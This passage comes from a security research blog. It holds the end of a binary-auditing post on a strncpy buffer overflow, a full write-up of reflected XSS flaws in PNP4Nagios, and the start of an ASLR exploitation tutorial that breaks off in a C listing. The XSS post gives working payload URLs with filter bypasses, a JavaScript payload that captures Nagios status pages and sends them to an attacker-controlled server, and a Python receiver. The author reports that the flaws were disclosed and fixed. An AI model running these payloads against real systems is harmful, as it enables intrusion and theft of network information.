0x080486c4 lt;+34gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="x" 0x080486ca lt;+40gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x080486cd lt;+43gt;: call 0x8048510 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pYou can see that 1 is added to the return value and it is put on the stack as the third argument to codestrncpy/code./p pThe pointer to the function argument is then put on the stack as the second argument (on line 3 and 4)./p pLastly the address of the local variable is then put on the stack as the first argument (on lines 5 and 6)./p pHere we can see that the local variable is 0x20c bytes (524 bytes) away from EBP, meaning that we'll need to write 528 bytes until we overwrite EIP using an overflow here, 4 bytes are added for the old EBP saved during the prologue./p pLooking at the prototype for codestrncpy/code (using codeman strncpy/code), we can see that the first argument is the destination, second the source and third the maximum characters to copy:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" char *strncpy(char *dest, const char *src, size_t n);/span/span span class="code-line"/code/pre/div /td/tr/table pKnowing all of this, its easy to see that there is in fact a buffer overflow here because the developer has used the length of the input buffer to bound the copy function. We can even see how many bytes we have until we overwrite EIP./p h2Conclusion/h2 pWhile its technically possible to just fuzz all of the application inputs, the more complex the application gets the more infeasible it becomes./p pThis is also true for reverse engineering every section of an application so its important that you know how to focus on the important parts of the application./p pUltimately reverse engineering is much more powerful than fuzzing but both should be used in combination to increase efficiency./p pHappy Hacking :-)/p

XSS in PNP4Nagios

4 July 2014 at 17:55
By: 0xe7
pYesterday a href="http://seclists.org/oss-sec/2014/q3/26" target="_blank"this/a was sent to the a href="http://oss-security.openwall.org/wiki/" target="_blank"OSS-Security mailing list/a. For some reason the subject caught my eye (strongCVE request: pnp4nagios - Two URL Cross-Site Scripting Vulnerabilities/strong)./p pNeedless to say, I didn't bother reading it, the investigation started immediately. This is a result of that investigation./p !-- more -- pI started by downloading and installing Nagios and PNP4Nagios onto a freshly installed Debian Wheezy VM./p pI'm not going to go into the actual installation, its easy enough and there is plenty of documentation that explains how to do it, all I will say is that you will need Nagios 3 (I couldn't get PNP4Nagios working with Nagios 4) and I installed the latest version of PNP4Nagios (which was 0.6.22 at the time of writing)./p pYou might have to leave Nagios a few minutes to collect some data, I didn't set up some any services, Nagios comes with some default services which should be fine for our purposes./p pAfter this and you have removed code/usr/local/pnp4nagios/share/install.php/code from the server, visit codehttp://[server]/pnp4nagios//code, put in the username and password; and you should see this:/p pimg src="/assets/images/web-hacking/pnp4nagios-start.png" width="750"/p h2Testing The App/h2 pFirst it makes sense to test this input we have (codehost/code) for the most basic types of XSS:/p pimg src="/assets/images/web-hacking/pnp4nagios-host-first.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-host-second.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-host-third.png" width="750"/p pAs you can see, there is some filtering going on here, although it does confuse me as to why HTML is allowed to be injected at all./p pThe filtering going on here looks like its replacing at least '/' (strongforward slash/strong) and ' ' (strongspace/strong) with '_' (strongunderscore/strong)./p pAnd looking at the source, the output is encoded:/p pimg src="/assets/images/web-hacking/pnp4nagios-host-third-source.png" width="750"/p pAfter clicking on a service and a timerange on the right, a few more inputs appear:/p pimg src="/assets/images/web-hacking/pnp4nagios-more.png" width="750"/p pFrom the previous tests it seems that the error page has reasonably good filtering, so let's try to avoid that and come back to it later if we have to./p pWe have 2 new inputs to test (codesrv/code and codeview/code), I test each of these by appending codelt;foobargt;/code to them./p pTesting codesrv/code this way brings me back to the error page but testing codeview/code the page loads fine:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-first.png" width="750"/p pLooking at the source and searching for codefoobar/code, we can see that it is stored in a hidden input tag and there doesn't seem to be any filtering:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-first-source.png" width="750"/p h2Exploiting The App/h2 pLets try the normal tests, while prepending code"gt;/code to break out of the input tag, and look at the source:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-script-source.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-view-img-source.png" width="750"/p pWe're very nearly there, it looks like codeonerror/code attribute is being removed (I tried a few others as well and they were all removed), let's try and fool the filter using the classic code/**//code method:/p pimg src="/assets/images/web-hacking/pnp4nagios-xss.png" width="750"/p pSuccess!/p pThe full URL I typed here was codehttp://dev/pnp4nagios/graph?host=localhostamp;srv=_HOST_amp;view=3%22%3E%3Cimg%20src=F%20/**/onerror=%22alert%281%29%22%3E/code/p pIn fact, what this application seems to be doing is adding hidden fields for any argument that you give it and doesn't do sufficient filtering on any of them, I send this url (codehttp://dev/pnp4nagios/graph?host=localhostamp;srv=_HOST_amp;monkey=foobar/code) and this was the resulting source:/p pimg src="/assets/images/web-hacking/pnp4nagios-monkey.png" width="750"/p h2Finding Another XSS/h2 pLet's also have a look at the zoom function on these graphs, clicking the zoom button (the little magnifying glass icon) you get this window:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom.png" width="750"/p pI copied the full URL and pasted it into my normal browser window so that I can play with the URL./p pLooking at the source the first thing I notice is that some of these inputs are vulnerable to the same XSS, inside the codeimg/code tag near the bottom, it seems to be subjected to the same filtering so I assume that it is the same vulnerability, however the second thing I notice is inside the codescript/code tags, inside a function called coderedirect/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom-js.png" width="750"/p pAs you can see, it appears that 1 of our inputs (codesource/code) is put inside these script tags, let's test to see what type of filtering it is subjected to:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom-js-test.png" width="750"/p pApparently there is no filtering here!/p pNow all we have to do is figure out the correct prefix and suffix to allow us to run our javascript and still maintain valid syntax./p pWe are inside a function that we need to break out of if we want our code to run on load, we do this by prepending code;};/code to our payload./p pNext we need to start a new function to ensure the syntax is correct, we do this by appending codefunction r(){/code, so our payload end up like this code;};alert(1);function r(){/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-xss2.png" width="750"/p pNice! We have our second XSS! :-)/p pHere is the full URL I used: codehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0;};alert%281%29;function%20r%28%29{amp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p h2Going Beyond Alert(1)/h2 pI decided to demonstrate what can be done with this vulnerability./p pI will use a javascript library called a href="http://html2canvas.hertzen.com/" target="_blank"html2canvas/a to create a screenshot of a Nagios page to get as much information as possible about the network that is being monitored by Nagios./p pThe page we will target is codehttp://dev/nagios/cgi-bin/status.cgi?host=all/code. This page lists all of the hosts and services, on a real monitoring server we could get some juicy information on this page./p pHere is the javascript that I wrote for this purpose:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nx"d/spanspan class="o"=/spanspan class="nb"document/spanspan class="p";/spanspan class="kd"function/span span class="nx"r/spanspan class="p"(){/spanspan class="nx"n/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"childNodes/spanspan class="p";/spanspan class="k"for/spanspan class="p"(/spanspan class="nx"i/spanspan class="o"=/spanspan class="mf"0/spanspan class="p";/spanspan class="nx"i/spanspan class="o"lt;/spanspan class="nx"n/spanspan class="p"./spanspan class="nx"length/spanspan class="p";/spanspan class="nx"i/spanspan class="o"++/spanspan class="p"){/spanspan class="nx"n/spanspan class="p"[/spanspan class="nx"i/spanspan class="p"]./spanspan class="nx"remove/spanspan class="p"()/span/span span class="code-line"span class="p";};};/spanspan class="k"for/spanspan class="p"(/spanspan class="nx"i/spanspan class="o"=/spanspan class="mf"0/spanspan class="p";/spanspan class="nx"i/spanspan class="o"lt;/spanspan class="mf"3/spanspan class="p";/spanspan class="nx"i/spanspan class="o"++/spanspan class="p"){/spanspan class="nx"r/spanspan class="p"();};/spanspan class="nb"window/spanspan class="p"./spanspan class="nx"stop/spanspan class="p"();/spanspan class="nx"f/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p");/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"src/spanspan class="o"=/spanspan class="s1"#39;/nagios/cgi-bin/status.cgi?host=all#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"style/spanspan class="o"=/spanspan class="s1"#39;border: 0; position:fixed;/span/span span class="code-line"span class="s1" top:0; left:0; right:0;bottom:0; width:100%; height:100%#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"scrolling/spanspan class="o"=/spanspan class="s1"#39;no#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"id/spanspan class="o"=/spanspan class="s1"#39;e#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"onload/spanspan class="o"=/spanspan class="kd"function/span span class="p"(){/spanspan class="nx"html2canvas/spanspan class="p"(/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"getElementsByTagName/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p")[/spanspan class="mf"0/spanspan class="p"]/span/span span class="code-line"span class="p"./spanspan class="nx"contentDocument/spanspan class="p"./spanspan class="nx"documentElement/spanspan class="p",{/spanspan class="nx"onrendered/spanspan class="o":/span span class="kd"function/spanspan class="p"(/spanspan class="nx"canvas/spanspan class="p")/span/span span class="code-line"span class="p"{/spanspan class="nx"q/spanspan class="o"=/spanspan class="ow"new/span span class="nx"XMLHttpRequest/spanspan class="p"();/spanspan class="nx"q/spanspan class="p"./spanspan class="nx"open/spanspan class="p"(/spanspan class="s1"#39;GET#39;/spanspan class="p",/spanspan class="s1"#39;http://localhost:9000/?image=#39;/span/span span class="code-line"span class="o"+/spanspan class="nx"canvas/spanspan class="p"./spanspan class="nx"toDataURL/spanspan class="p"(),/spanspan class="kc"true/spanspan class="p");/spanspan class="nx"q/spanspan class="p"./spanspan class="nx"send/spanspan class="p"(/spanspan class="kc"null/spanspan class="p");}});};/spanspan class="nx"s/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;script#39;/spanspan class="p");/span/span span class="code-line"span class="nx"s/spanspan class="p"./spanspan class="nx"src/spanspan class="o"=/spanspan class="s1"#39;http://html2canvas.hertzen.com/build/html2canvas.js#39;/spanspan class="p";/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"s/spanspan class="p");/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"f/spanspan class="p");/span/span span class="code-line"/code/pre/div /td/tr/table pI originally had it all on 1 line but I put it on seperate lines here for readability (this will work as is, you will just need to join lines 3 and 4)./p pThis javascript works perfectly for both of the XSS vulnerabilities we have found, just replace codealert(1)/code with a a href="http://www.w3schools.com/tags/ref_urlencode.asp" target="_blank"URL encoded/a version of the code above. a href="http://meyerweb.com/eric/tools/dencoder/" target="_blank"This/a site will encode it for you./p pI tried to make the payload reasonably small, you generally want to make an exploit payload as small as possible to raise as little suspicion as possible. I could probably have shrunk it more, especially as the site is using jquery but I'll leave that to someone else./p pLet's analyse this code a little and see what it is doing./p pFirstly it implements a function where it iterates through every element in the body of the page and removes it. Now we have a blank body to build on top of./p pNext it runs codewindow.stop();/code, this stops the main page from refreshing every 90 seconds./p pIt then creates an codeiframe/code which fills the page and has the src attribute set to code/nagios/cgi-bin/status.cgi?host=all/code./p pThe codeonload/code event of the iframe is then hooked, inside this function it uses html2canvas using the HTML content of the iframe and hooks the codeonrendered/code event./p pOnce html2canvas has rendered the page it sends a GET request to codehttp://localhost:9000/?image=/code with the base64 encoded output of html2canvas appended (this could be a link to any server under the attackers control)./p pLastly it creates a script tag with codehttp://html2canvas.hertzen.com/build/html2canvas.js/code (the html2canvas library) as the src attribute and appends the script tag and iframe to the body of the page./p pWhen run through a a href="http://jsbeautifier.org/" target="_blank"beautifier/a, the code looks like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nx"d/span span class="o"=/span span class="nb"document/spanspan class="p";/span/span span class="code-line"/span span class="code-line"span class="kd"function/span span class="nx"r/spanspan class="p"()/span span class="p"{/span/span span class="code-line" span class="nx"n/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"childNodes/spanspan class="p";/span/span span class="code-line" span class="k"for/span span class="p"(/spanspan class="nx"i/span span class="o"=/span span class="mf"0/spanspan class="p";/span span class="nx"i/span span class="o"lt;/span span class="nx"n/spanspan class="p"./spanspan class="nx"length/spanspan class="p";/span span class="nx"i/spanspan class="o"++/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"n/spanspan class="p"[/spanspan class="nx"i/spanspan class="p"]./spanspan class="nx"remove/spanspan class="p"();/span/span span class="code-line" span class="p"};/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="k"for/span span class="p"(/spanspan class="nx"i/span span class="o"=/span span class="mf"0/spanspan class="p";/span span class="nx"i/span span class="o"lt;/span span class="mf"3/spanspan class="p";/span span class="nx"i/spanspan class="o"++/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"r/spanspan class="p"();/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="nb"window/spanspan class="p"./spanspan class="nx"stop/spanspan class="p"();/span/span span class="code-line"span class="nx"f/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p");/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"src/span span class="o"=/span span class="s1"#39;/nagios/cgi-bin/status.cgi?host=all#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"style/span span class="o"=/span span class="s1"#39;border: 0; position:fixed; top:0; left:0; right:0;bottom:0; width:100%; height:100%#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"scrolling/span span class="o"=/span span class="s1"#39;no#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"id/span span class="o"=/span span class="s1"#39;e#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"onload/span span class="o"=/span span class="kd"function/span span class="p"()/span span class="p"{/span/span span class="code-line" span class="nx"html2canvas/spanspan class="p"(/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"getElementsByTagName/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p")[/spanspan class="mf"0/spanspan class="p"]./spanspan class="nx"contentDocument/spanspan class="p"./spanspan class="nx"documentElement/spanspan class="p",/span span class="p"{/span/span span class="code-line" span class="nx"onrendered/spanspan class="o":/span span class="kd"function/span span class="p"(/spanspan class="nx"canvas/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"q/span span class="o"=/span span class="ow"new/span span class="nx"XMLHttpRequest/spanspan class="p"();/span/span span class="code-line" span class="nx"q/spanspan class="p"./spanspan class="nx"open/spanspan class="p"(/spanspan class="s1"#39;GET#39;/spanspan class="p",/span span class="s1"#39;http://localhost:9000/?image=#39;/span span class="o"+/span span class="nx"canvas/spanspan class="p"./spanspan class="nx"toDataURL/spanspan class="p"(),/span span class="kc"true/spanspan class="p");/span/span span class="code-line" span class="nx"q/spanspan class="p"./spanspan class="nx"send/spanspan class="p"(/spanspan class="kc"null/spanspan class="p");/span/span span class="code-line" span class="p"}/span/span span class="code-line" span class="p"});/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="nx"s/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;script#39;/spanspan class="p");/span/span span class="code-line"span class="nx"s/spanspan class="p"./spanspan class="nx"src/span span class="o"=/span span class="s1"#39;http://html2canvas.hertzen.com/build/html2canvas.js#39;/spanspan class="p";/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"s/spanspan class="p");/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"f/spanspan class="p");/span/span span class="code-line"/code/pre/div /td/tr/table pWe're nearly there. To automate the receiving of the image, I've written a python script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"SocketServer/spanspan class="o",/span span class="nn"base64/span/span span class="code-line"/span span class="code-line"span class="k"class/span span class="nc"H2CHandler/spanspan class="p"(/spanspan class="n"SocketServer/spanspan class="o"./spanspan class="n"BaseRequestHandler/spanspan class="p"):/span/span span class="code-line" span class="k"def/span span class="nf"handle/spanspan class="p"(/spanspan class="bp"self/spanspan class="p"):/span/span span class="code-line" span class="n"fulldata/span span class="o"=/span span class="s1"#39;#39;/span/span span class="code-line" span class="n"data/span span class="o"=/span span class="s1"#39;dummy#39;/span/span span class="code-line" span class="k"while/span span class="nb"len/spanspan class="p"(/spanspan class="n"data/spanspan class="p"):/span/span span class="code-line" span class="n"data/span span class="o"=/span span class="bp"self/spanspan class="o"./spanspan class="n"request/spanspan class="o"./spanspan class="n"recv/spanspan class="p"(/spanspan class="mi"4096/spanspan class="p")/span/span span class="code-line" span class="n"fulldata/span span class="o"+=/span span class="n"data/span/span span class="code-line" span class="k"if/span span class="n"fulldata/spanspan class="o"./spanspan class="n"find/spanspan class="p"(/spanspan class="s1"#39;Host:#39;/spanspan class="p")/span span class="o"!=/span span class="o"-/spanspan class="mi"1/spanspan class="p":/span/span span class="code-line" span class="k"break/span/span span class="code-line" span class="nb"print/span span class="s1"#39;got image#39;/span/span span class="code-line" span class="n"img/span span class="o"=/span span class="n"fulldata/spanspan class="o"./spanspan class="n"split/spanspan class="p"(/spanspan class="s1"#39;base64,#39;/spanspan class="p")[/spanspan class="mi"1/spanspan class="p"]/spanspan class="o"./spanspan class="n"split/spanspan class="p"(/spanspan class="s1"#39; #39;/spanspan class="p")[/spanspan class="mi"0/spanspan class="p"]/span/span span class="code-line"/span span class="code-line" span class="n"fd/span span class="o"=/span span class="nb"open/spanspan class="p"(/spanspan class="s2"quot;/tmp/imgs/test.pngquot;/spanspan class="p",/span span class="s2"quot;wquot;/spanspan class="p")/span/span span class="code-line" span class="n"fd/spanspan class="o"./spanspan class="n"write/spanspan class="p"(/spanspan class="n"base64/spanspan class="o"./spanspan class="n"b64decode/spanspan class="p"(/spanspan class="n"img/spanspan class="p"))/span/span span class="code-line" span class="n"fd/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/span span class="code-line"span class="n"serverAddr/span span class="o"=/span span class="p"(/spanspan class="s2"quot;0.0.0.0quot;/spanspan class="p",/span span class="mi"9000/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="n"server/span span class="o"=/span span class="n"SocketServer/spanspan class="o"./spanspan class="n"TCPServer/spanspan class="p"(/spanspan class="n"serverAddr/spanspan class="p",/span span class="n"H2CHandler/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="n"server/spanspan class="o"./spanspan class="n"serve_forever/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table pThis script could be improved but it will serve our purpose right now./p pIf you run our payload while this server is running an image like the following should be created in code/tmp/imgs/test.png/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-html2canvas.png" width="750"/p h2Conclusion/h2 pNo user input should be trusted in any situation. All input should be properly sanitized and in regards to websites, if HTML is not needed (as in this case), it should not be allowed./p pIn both of these cases, only numerical inputs should be allowed and everything else should be dropped./p pHappy Hacking :-)/p pstrongEDIT (2014-07-16):/strong/p pOn the day I posted this (2014-07-04) I informed the developers incase I had found new vulnerabilities that they didn't already know about and wasn't mention in the post to the OSS-Security mailing list./p pA bit of back and fourth went on (I installed their latest version from github) until it was clear that 2 of the 3 vulnerabilities I found were actually new:/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0;%7D;alert%281%29;function%20r%28%29%7Bamp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0%22%3E%3Cimg%20src=F%20/**/onerror=%22alert%281%29%22%3Eamp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p pThe second one here I dismissed in my post as probably the same as the previous 1 I had found but in fact it wasn't, the first 1 I found in the post above was already fixed./p pSo the developers went away and fixed these 2 vulnerabilities on 2014-07-09, a href="https://github.com/lingej/pnp4nagios/commit/10000112eb87f23d136a121a8d49c6dcc3b1e82e" target="_blank"here/a are the commits./p pSo I had another look and about an hour later I found another:/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=_%22%3E%3Cimg%20src=B%20/**/onerror=%22alert%281%29%22%3E_amp;view=1amp;source=0amp;end=1404916359amp;start=1404826359/code/p pAgain I informed the developer and it was fixed on 2014-07-12, a href="https://github.com/lingej/pnp4nagios/commit/25de355097b3cf5d82ed3b63d68faadad7084e15" target="_blank"here/a are the commits./p

Beating ASLR

7 July 2014 at 15:58
By: 0xe7
pHere we are going to start with the first protection I want to look at which is a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization" target="_blank"address space layout randomization (ASLR)/a./p pIn parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a, a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a and a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a ASLR had been disabled./p pASLR basically randomizes the a href="https://en.wikipedia.org/wiki/Virtual_address_space" target="_blank"virtual address space/a of all userland applications and in more modern OSs, kernel space too./p !-- more -- pBefore ASLR, the virtual address space of an application was completely static, meaning that everything will always be at the same memory address each time the application is run./p pIn parts 1, 2 and 3 we've taken advantage of this by being able to predict the address that our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a./p pThis protection is slightly newer in the Linux kernel than a href="https://en.wikipedia.org/wiki/NX_bit" target="_blank"NX/a, as it was first implemented in 2005 but it will introduce us to an idea which we will use much more extensively to beat NX./p h2The App/h2 pThe application below is almost the same as the 1 in part a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a of this series:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" 